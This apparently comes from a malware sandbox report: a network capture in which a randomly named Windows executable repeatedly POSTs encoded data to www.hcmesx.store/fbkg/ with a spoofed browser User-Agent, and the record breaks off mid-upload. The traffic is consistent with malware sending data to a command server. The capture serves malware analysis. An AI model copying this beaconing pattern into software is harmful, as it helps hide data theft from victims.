                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:31:54 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                Data Raw: 31 62 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 52 c1 6e 13 31 10 bd f7 2b 8c 11 12 48 bb eb 4d ab 4a 68 b3 bb a8 0a 29 07 22 b5 aa c2 a1 27 e4 d8 26 eb 76 6d af ec 49 d2 50 55 e2 c2 5f 70 ab 8a b8 f4 ce a5 3f 53 51 c4 67 60 af 43 8b 2a f0 c5 7e 33 e3 f7 9e c7 53 3e 79 7d 30 9a 1e 1f 8e 51 03 aa ad b7 ca 3f 9b a0 dc 23 c7 ac ec 00 b1 86 5a 27 a0 c2 ef a6 fb e9 4b 8c 24 af f0 64 ef fd e8 60 32 19 8f a6 18 39 cb 2a 4c 88 e3 a7 d9 ee 20 6b 29 39 71 a9 07 69 67 4d a6 a4 ce 4e 1c ae 4b 12 c9 ee 59 eb c9 5e 26 b5 84 e7 e7 92 17 f8 ed 78 be 86 23 da 6e 2f f6 cd 0e 6c bf c1 09 3b fd 47 f4 e2 c5 03 0f 2a 95 00 fa d8 5c bd 85 fc 8a a9 e0 73 29 c5 aa 33 16 30 d2 54 89 bf 31 33 1a 84 f6 af 5a 49 0e 4d c5 c5 52 32 91 f6 20 f1 ae a5 5a a8 d4 31 da 8a 6a 90 e5 89 a2 67 8f 22 0b 27 6c 5f 40 67 be 46 1b ec a5 a3 38 48 68 45 fd f3 fa f2 ee cb b7 5f 37 37 77 9f af 7e 7c bf be fd f4 b5 24 31 13 ab 1c ac 7d 55 7f 0e 2b 74 3e 99 19 be 4e e4 07 eb ad 9e f7 4e 0a 34 c8 f3 67 c3 46 c8 79 03 1b d0 51 ce a5 9e 17 28 1f 2a 6a e7 52 fb d3 c5 3d cf d3 95 a5 dd ff 2f 3f 14 6e 64 66 c6 72 61 0b a4 8d 16 c3 98 f5 3d 8e de 4a d2 c4 41 08 be fc cf 71 b9 ec 3f 3f 48 84 e7 86 4e 47 9a 38 03 0d 40 e7 0a 42 f8 d9 5a c1 c7 7c 27 63 8c b0 8e e5 bb e4 95 9f 21 ad 45 3b 32 5c 54 7d 28 8c 44 bc eb 89 89 67 0e db 46 87 f4 63 f8 1b 64 53 ca f5 9d 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 1b7uRn1+HMJh)"'&vmIPU_p?SQg`C*~3S>y}0Q?#Z'K$d`29*L k)9qigMNKY^&x#n/l;G*\s)30T13ZIMR2 Z1jg"'l_@gF8HhE_77w~|$1}U+t>NN4gFyQ(*jR=/?ndfra=JAq??HNG8@BZ|'c!E;2\T}(DgFcdS0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                6538.59.48.8680192.168.11.2050192C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:31:54.068592072 CET1303OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.hcmesx.store
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 524
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.hcmesx.store
                                                                                                                                                                                                Referer: http://www.hcmesx.store/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 45 73 6e 65 31 38 33 7a 70 35 41 69 7a 68 6d 30 66 37 5a 39 34 32 35 67 68 4b 58 5a 72 73 35 47 36 67 73 77 48 49 5a 68 4a 59 55 7a 39 56 32 6f 71 50 73 4a 38 68 42 36 49 75 4e 67 6a 35 75 73 56 55 33 72 64 41 6d 72 34 52 74 59 67 72 4b 77 75 4a 32 55 69 6c 73 7a 65 4e 54 4a 49 42 6f 49 4d 71 66 67 66 2f 51 4c 75 6f 6b 6e 2f 67 73 31 6d 7a 6f 2f 6f 37 4d 4c 75 41 77 54 61 79 50 46 67 38 43 62 73 72 4d 70 61 34 4c 39 4e 71 76 76 6a 56 69 44 4b 66 74 4d 36 4d 58 75 52 78 4a 71 7a 53 6f 57 65 4b 32 52 6e 42 64 41 37 4c 35 48 53 6e 6e 79 32 52 73 44 6c 73 75 6e 2f 68 54 59 37 67 2f 2b 79 73 52 72 79 47 48 55 52 46 68 61 43 45 35 69 5a 2f 39 58 48 70 77 4d 58 79 55 4e 65 72 48 44 55 6d 44 5a 69 53 74 6b 2b 78 78 52 76 65 75 39 63 71 4f 79 64 6a 64 48 46 75 59 47 59 6a 43 76 71 6e 48 44 72 45 31 4c 33 62 4f 4a 43 73 68 69 6d 33 68 67 38 78 66 76 4d 7a 68 63 42 4b 61 44 52 77 78 78 4c 4b 6a 2b 6e 52 4f 42 56 72 4d 71 42 2b 49 4a 45 4c 31 65 77 78 74 6b 71 33 66 31 5a 5a 41 56 4d 6b 54 38 33 50 68 4b 79 70 7a 55 44 70 42 7a 35 37 6b 37 57 4e 59 2f 6b 34 76 33 73 31 41 57 30 54 4e 38 2f 42 35 4a 67 52 50 59 31 46 56 5a 55 48 6d 43 4c 43 49 67 4f 4e 38 64 69 5a 43 6f 63 35 4f 6c 35 68 65 52 42 35 57 58 61 73 43 66 75 47 79 70 42 75 65 45 32 59 69 6c 2b 4e 6a 63 38 33 77 6a 37 6d 61 2f 77 41 73 66 6f 63 52 45 72 46 33 42 4f 2f 30 76 6d 42 55 78 52 52 54 47 50 44 63 6d 6e 76 42 42 30 54 77 61 66 6e 70 55 6a 69 6e 78 4e 2f 6a 66 4d 64 6d 35 6b 75 6a 57 7a 72 72 4c 46 55 4d 4b 58 6b 58 43 39 33 61 48 67 74 5a 76 59 57 65 63 78 48 37 6e 35 5a 6b 3d
                                                                                                                                                                                                Data Ascii: T6I=Esne183zp5Aizhm0f7Z9425ghKXZrs5G6gswHIZhJYUz9V2oqPsJ8hB6IuNgj5usVU3rdAmr4RtYgrKwuJ2UilszeNTJIBoIMqfgf/QLuokn/gs1mzo/o7MLuAwTayPFg8CbsrMpa4L9NqvvjViDKftM6MXuRxJqzSoWeK2RnBdA7L5HSnny2RsDlsun/hTY7g/+ysRryGHURFhaCE5iZ/9XHpwMXyUNerHDUmDZiStk+xxRveu9cqOydjdHFuYGYjCvqnHDrE1L3bOJCshim3hg8xfvMzhcBKaDRwxxLKj+nROBVrMqB+IJEL1ewxtkq3f1ZZAVMkT83PhKypzUDpBz57k7WNY/k4v3s1AW0TN8/B5JgRPY1FVZUHmCLCIgON8diZCoc5Ol5heRB5WXasCfuGypBueE2Yil+Njc83wj7ma/wAsfocRErF3BO/0vmBUxRRTGPDcmnvBB0TwafnpUjinxN/jfMdm5kujWzrrLFUMKXkXC93aHgtZvYWecxH7n5Zk=
                                                                                                                                                                                                Nov 17, 2023 19:31:54.234873056 CET1304INHTTP/1.1 200 OK
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:31:54 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                Data Raw: 31 62 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 52 c1 6e 13 31 10 bd f7 2b 8c 11 12 48 bb eb 4d ab 4a 68 b3 bb a8 0a 29 07 22 b5 aa c2 a1 27 e4 d8 26 eb 76 6d af ec 49 d2 50 55 e2 c2 5f 70 ab 8a b8 f4 ce a5 3f 53 51 c4 67 60 af 43 8b 2a f0 c5 7e 33 e3 f7 9e c7 53 3e 79 7d 30 9a 1e 1f 8e 51 03 aa ad b7 ca 3f 9b a0 dc 23 c7 ac ec 00 b1 86 5a 27 a0 c2 ef a6 fb e9 4b 8c 24 af f0 64 ef fd e8 60 32 19 8f a6 18 39 cb 2a 4c 88 e3 a7 d9 ee 20 6b 29 39 71 a9 07 69 67 4d a6 a4 ce 4e 1c ae 4b 12 c9 ee 59 eb c9 5e 26 b5 84 e7 e7 92 17 f8 ed 78 be 86 23 da 6e 2f f6 cd 0e 6c bf c1 09 3b fd 47 f4 e2 c5 03 0f 2a 95 00 fa d8 5c bd 85 fc 8a a9 e0 73 29 c5 aa 33 16 30 d2 54 89 bf 31 33 1a 84 f6 af 5a 49 0e 4d c5 c5 52 32 91 f6 20 f1 ae a5 5a a8 d4 31 da 8a 6a 90 e5 89 a2 67 8f 22 0b 27 6c 5f 40 67 be 46 1b ec a5 a3 38 48 68 45 fd f3 fa f2 ee cb b7 5f 37 37 77 9f af 7e 7c bf be fd f4 b5 24 31 13 ab 1c ac 7d 55 7f 0e 2b 74 3e 99 19 be 4e e4 07 eb ad 9e f7 4e 0a 34 c8 f3 67 c3 46 c8 79 03 1b d0 51 ce a5 9e 17 28 1f 2a 6a e7 52 fb d3 c5 3d cf d3 95 a5 dd ff 2f 3f 14 6e 64 66 c6 72 61 0b a4 8d 16 c3 98 f5 3d 8e de 4a d2 c4 41 08 be fc cf 71 b9 ec 3f 3f 48 84 e7 86 4e 47 9a 38 03 0d 40 e7 0a 42 f8 d9 5a c1 c7 7c 27 63 8c b0 8e e5 bb e4 95 9f 21 ad 45 3b 32 5c 54 7d 28 8c 44 bc eb 89 89 67 0e db 46 87 f4 63 f8 1b 64 53 ca f5 9d 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 1b7uRn1+HMJh)"'&vmIPU_p?SQg`C*~3S>y}0Q?#Z'K$d`29*L k)9qigMNKY^&x#n/l;G*\s)30T13ZIMR2 Z1jg"'l_@gF8HhE_77w~|$1}U+t>NN4gFyQ(*jR=/?ndfra=JAq??HNG8@BZ|'c!E;2\T}(DgFcdS0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                6638.59.48.8680192.168.11.2050193C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:31:56.758397102 CET1310OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.hcmesx.store
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 52912
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.hcmesx.store
                                                                                                                                                                                                Referer: http://www.hcmesx.store/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 45 73 6e 65 31 38 33 7a 70 35 41 69 7a 68 6d 30 66 37 5a 39 34 32 35 67 68 4b 58 5a 72 73 35 47 36 67 73 77 48 49 5a 68 4a 65 4d 7a 39 6e 2b 6f 72 73 55 4a 39 68 42 36 4a 75 4e 68 6a 35 75 68 56 51 61 67 64 41 6a 51 34 54 6c 59 67 37 36 77 76 36 65 55 6e 6c 73 49 62 4e 54 48 66 52 70 52 4d 71 54 30 66 2f 73 39 75 59 51 6e 2b 6a 59 31 78 30 30 38 6d 4c 4e 43 75 41 77 68 65 79 50 33 67 38 47 4c 73 72 41 70 61 2b 54 39 4d 5a 58 76 6d 45 69 44 53 2f 74 50 77 73 58 71 59 52 4a 6c 7a 53 74 76 65 4b 32 72 6e 41 5a 41 37 4d 4e 48 52 6d 6e 78 32 78 73 44 35 63 75 6b 73 78 66 63 37 67 6a 6d 79 73 4e 72 79 45 58 55 52 6c 68 61 47 58 68 74 4f 76 39 52 56 5a 77 62 54 79 59 2f 65 71 6d 6b 55 6a 54 5a 69 69 35 6b 2f 47 74 52 67 66 75 39 65 4b 4f 77 5a 6a 63 44 65 65 59 43 59 6a 79 43 71 6d 6e 39 72 46 64 4c 33 35 57 4a 55 64 68 74 6b 58 68 71 32 52 66 2b 49 7a 64 51 42 4a 79 66 52 77 78 62 4c 4c 6e 2b 6e 68 2b 42 57 76 59 70 43 75 4a 42 4f 62 30 57 70 42 70 35 71 33 54 39 5a 5a 59 46 4d 6e 2f 38 78 66 68 4b 35 75 76 4c 59 70 42 2b 78 62 6b 54 59 74 5a 33 6b 34 71 6b 73 31 6f 73 30 6a 78 38 2b 78 70 4a 6b 42 50 62 2b 46 56 64 4e 58 6d 4d 64 79 49 67 4f 4e 77 52 69 5a 2b 6f 66 4c 65 6c 34 53 57 52 46 6f 57 58 4b 63 43 64 75 47 79 61 42 75 53 4e 32 59 36 48 2b 4e 54 69 38 31 63 6a 36 33 4b 2f 31 42 73 41 39 38 52 42 68 6c 33 6f 44 66 34 47 6d 41 34 70 52 52 43 37 50 54 67 6d 6d 72 6c 42 77 54 77 46 4b 33 70 54 6b 69 6d 6b 63 76 75 65 4d 64 37 47 6b 76 57 4c 7a 73 33 4c 45 67 31 4c 51 56 6e 2f 6b 30 71 31 2f 4e 64 4d 55 31 65 32 73 47 58 74 37 66 6c 43 6d 62 36 34 38 42 41 45 69 59 65 6f 77 6a 6b 31 57 58 48 4d 32 38 32 61 63 51 47 4e 73 6c 66 6a 2b 66 35 4a 6f 53 36 6b 4d 6f 68 75 78 74 61 76 6c 56 52 59 38 69 6e 43 32 42 4a 59 68 69 4e 57 65 65 48 37 31 78 4b 63 48 56 39 79 77 42 6c 42 44 45 33 4b 55 37 78 61 67 69 4b 2f 2b 64 35 54 30 4a 2f 58 50 4c 73 61 5a 69 43 4b 64 66 4c 66 48 77 66 58 67 63 72 70 35 63 41 47 67 55 6f 34 46 54 4b 75 7a 56 2b 4c 64 59 6a 52 75 75 69 73 68 71 30 47 49 4f 36 68 52 30 36 36 7a 6b 4a 78 48 6f 31 71 31 55 76 73 6e 77 5a 31 6e 33 55 47 38 61 39 7a 2f 50 6c 44 6e 79 4d 6d 75 53 55 4c 41 7a 64 45 53 76 69 5a 48 70 72 51 75 6a 34 34 36 74 44 7a 77 45 68 64 6e 4e 51 31 57 79 71 55 44 78 76 67 6e 61 78 6c 79 5a 4d 34 2f 4f 73 62 48 66 2f 72 77 58 42 57 59 51 52 49 38 45 67 54 5a 30 4b 4a 48 76 53 66 46 66 44 5a 4e 45 36 58 50 58 39 67 49 38 57 50 69 6b 6d 63 4f 63 32 6f 4d 6b 2f 50 62 75 68 42 72 58 51 61 63 52 4b 45 58 68 35 61 63 6b 6d 73 44 4a 69 78 30 2b 70 7a 2b 44 79 71 39 6f 31 56 45 2b 67 52 36 79 78 6c 62 50 6c 35 71 4f 35 4c 48 32 66 58 4d 71 64 34 5a 55 36 7a 6c 4d 75 73 38 38 45 72 59 73 6b 69 37 69 5a 64 6f 53 36 78 46 4c 72 6b 76 6e 2f 43 59 43 66 75 4d 79 64 66 52 55 5a 6b 56 4e 77 70 35 6a 39 57 48 2f 52 48 56 6b 36 74 64 6e 77 49 43 70 53 54 69 49 4f 4e 30 34 72 36 74 64 38 76 6e 42 5a 4e 4f 42 57 74 79 42 6a 4f 69 65 77 4c 65 72 4c 2f 76 39 6d 35 7a 6e 6f 32 30 68 38 67 34 6a 46 68 57 39 61 67 6b 30 46 67 73 34 30 4b 42 55 66 5a 52 50 61 78 6b 50 75 4c 69 63 7a 58 34 76 39 32 33 45 41 45 6b 55 61 45 42 5a 4f 45 65 58 58 61 52 52 6f 44 32 67 75 6b 4f 6c 52 42 30 53 57 5a 68 69 36 6c 38 38 4b 4c 2b 50 7a 77 50 7a 5a 49 65 54 47 73 71 54 55 33 56 61 38 61 73 31 6f 79 54 78 78 70 55 31 39 4c 49 4e 6e 76 41 44 41 77 71 66 34 68 58 46 49 79 35 52 2b 59 33 6a 52 30 71 48 79 55 44 30 66 74 56 42 36 32 56 2f 55 70 69 39 57 31 79 75 37 30 63 78 78 32 67 68 71 73 77 4d 54 50 44 38 73 61 51 64 41 72 52 6e 71 7a 69 76 4a 41 2b 53 53 70 50 32 4e 57 54 71 5a 46 66 35 4b 4e 56 49 44 51 6b 64 59 4b 42 4f 62 2b 35 38 6f 68 49 31 53 2b 6c 66 68 37 4b 4e 31 6b 33 67 73 76 4a 47 69 64 6a 4a 37 6f 69 75 50 70 59 4c 73 52 6d 64 51 68 4e 71 4d 30 59 32 66 70 39 47 6e 7a 39 36 48 7a 68 66 46 52 32 49 74 43 43 34 2b 32 79 4f 2b 63 38 51 30 4c 44 65 66 4a 51 7a 55 43 6d 61 6e 67 6b 52 4a 61 37 30 63 6a 34 4e 46 59 43 39 75 4b 4e 55 5a 62 35 43 51 4f 6a 58 6f 57 37 38 55 5a 77 6b 46 6d 77 6b 6e 51 54 44 37 4f 4a 6e 37 75 74 77 6e 4d 30 2b 74 74 30 4f 49 4c 70 63 67 4b 57 47 68 56 70 53 59 45 54 35 2b
                                                                                                                                                                                                Data Ascii: T6I=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
                                                                                                                                                                                                Nov 17, 2023 19:31:56.758477926 CET1317OUTData Raw: 38 43 52 49 38 58 56 6b 47 42 47 30 6e 5a 35 37 55 6f 2b 55 4e 61 68 65 45 57 36 46 52 2f 67 4f 4a 34 35 54 52 6f 44 4d 4f 47 70 6e 6d 70 43 75 68 37 74 39 6d 2b 45 78 69 6a 50 65 54 59 41 43 56 64 6e 79 43 36 78 6a 74 42 42 45 31 44 39 38 57 36
                                                                                                                                                                                                Data Ascii: 8CRI8XVkGBG0nZ57Uo+UNaheEW6FR/gOJ45TRoDMOGpnmpCuh7t9m+ExijPeTYACVdnyC6xjtBBE1D98W6/Ihon+tT37R2yrWqIDlIJfF19ltXszpfz3YKc+N1vNEDxgH5EfR6JejtdKuhQrNbstFvO3SLTsbg9+J4WeQ0eUI8+WgqnktpP16kkcf96U+3h05Xiy3lFcZw/IyBGstDGzjz+AlYPoaHKCeulzB1Dz9d6P5TSU7q4
                                                                                                                                                                                                Nov 17, 2023 19:31:56.924401045 CET1322OUTData Raw: 4d 31 4d 2b 68 63 46 7a 65 62 58 4e 51 79 6a 31 57 31 51 35 62 30 51 4f 46 6a 71 63 63 71 7a 37 45 38 65 6d 66 6f 78 31 6c 6e 30 48 37 53 69 71 7a 35 37 50 66 71 50 63 79 4d 49 36 35 2f 74 37 77 4d 59 4a 4e 79 6c 6c 74 35 58 33 37 6b 59 2b 4e 4e
                                                                                                                                                                                                Data Ascii: M1M+hcFzebXNQyj1W1Q5b0QOFjqccqz7E8emfox1ln0H7Siqz57PfqPcyMI65/t7wMYJNyllt5X37kY+NNv07jClbKc7SLsRwMK85BtdxjYZsczKFWBmZ8eZcGQVyiUw20j62q3qk361bAAXM4kmE8yp7BxwrPfSJOeCJYIVIHMixaaIh/TlVCivpvV6foQ2ykZDNFG346w2bVLjMGawFRBVQqjaVQQRPcJHPQDPmXp6HxG2Ayv
                                                                                                                                                                                                Nov 17, 2023 19:31:56.924521923 CET1325OUTData Raw: 2f 73 69 65 2f 43 36 69 59 35 72 68 36 6b 55 65 4b 58 66 70 64 56 46 4b 64 4d 4b 39 64 69 61 43 51 35 46 6e 50 70 65 69 74 76 38 4e 6a 70 52 41 79 77 39 50 34 66 44 56 51 43 4c 51 73 2f 4d 33 35 4b 39 6b 61 32 74 36 74 79 50 71 41 54 6f 47 34 56
                                                                                                                                                                                                Data Ascii: /sie/C6iY5rh6kUeKXfpdVFKdMK9diaCQ5FnPpeitv8NjpRAyw9P4fDVQCLQs/M35K9ka2t6tyPqAToG4VEAxCsomRD7Bi7qizt2/L/vZk7/TGOB+pcoNVSXZUqwxFvzyUZDCjY8IUbUeMhuRgcbPLEsL5Ykg8TyVeOeOQdhv1/ywyCmJFlpQN2yxJmk1mYF++3OolUzRG+Qr2HWGHKJO7KV8v9xVKKQCsr8ARZnymFGbTRLoTb
                                                                                                                                                                                                Nov 17, 2023 19:31:56.924904108 CET1327OUTData Raw: 5a 2f 4e 53 56 7a 32 51 4f 57 48 4a 71 74 33 2f 47 6a 71 54 71 55 6f 36 57 33 77 42 62 41 52 56 49 6e 6a 32 73 61 63 70 79 76 53 67 63 79 48 68 4b 49 79 75 59 6b 67 69 6c 4a 37 6d 42 43 75 72 4c 4e 37 4a 57 61 43 52 2f 58 56 30 4d 72 76 31 6e 67
                                                                                                                                                                                                Data Ascii: Z/NSVz2QOWHJqt3/GjqTqUo6W3wBbARVInj2sacpyvSgcyHhKIyuYkgilJ7mBCurLN7JWaCR/XV0Mrv1ngVCvqZFt2yO919b3CYqK5a9eFCf34j6oxlmn+eVBvVWVhiVoCnn+WwUDy+OL0p3twXeiUcHVXLf5a8bvwNgCj/EcJppD16PVGgEQ1XEF5D/1tkJAyFAYNjarT2ORRdL/LhLHypkrTOcNivsPiHOQjVS+i/lJkQDjK+
